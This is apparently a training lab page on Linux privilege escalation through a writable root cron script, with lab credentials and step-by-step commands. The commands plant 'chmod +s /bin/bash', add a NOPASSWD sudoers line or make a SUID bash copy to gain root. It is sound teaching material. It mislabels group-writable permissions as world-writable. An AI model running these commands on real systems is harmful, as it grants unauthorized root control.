⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo | alice / alice123 | root / toor (goal: escalate to this)
Writable Cron Job Scripts
PRIVILEGE ESCALATION
# Step 1: View system cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
# Example vulnerable crontab:
* * * * * root /opt/scripts/backup.sh ← runs every minute as root
# Step 2: Check if the script is writable by you
ls -la /opt/scripts/backup.sh
# -rwxrwxr-x 1 root root /opt/scripts/backup.sh ← world-writable!
# Step 3: Overwrite the script with a reverse shell or SUID bash
echo 'chmod +s /bin/bash' >> /opt/scripts/backup.sh
# Wait 1 minute for cron to run it, then:
bash -p # -p preserves SUID (runs as root)
id # uid=0(root)
# Alternative payload — add yourself to sudoers:
echo 'ram ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
# Alternative payload — copy bash with SUID:
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/tmp/rootbash -p
# Tools to find cron-based privesc:
# pspy — monitors processes without root: github.com/DominicBreuker/pspy
./pspy64 # watch for cron jobs running as uid=0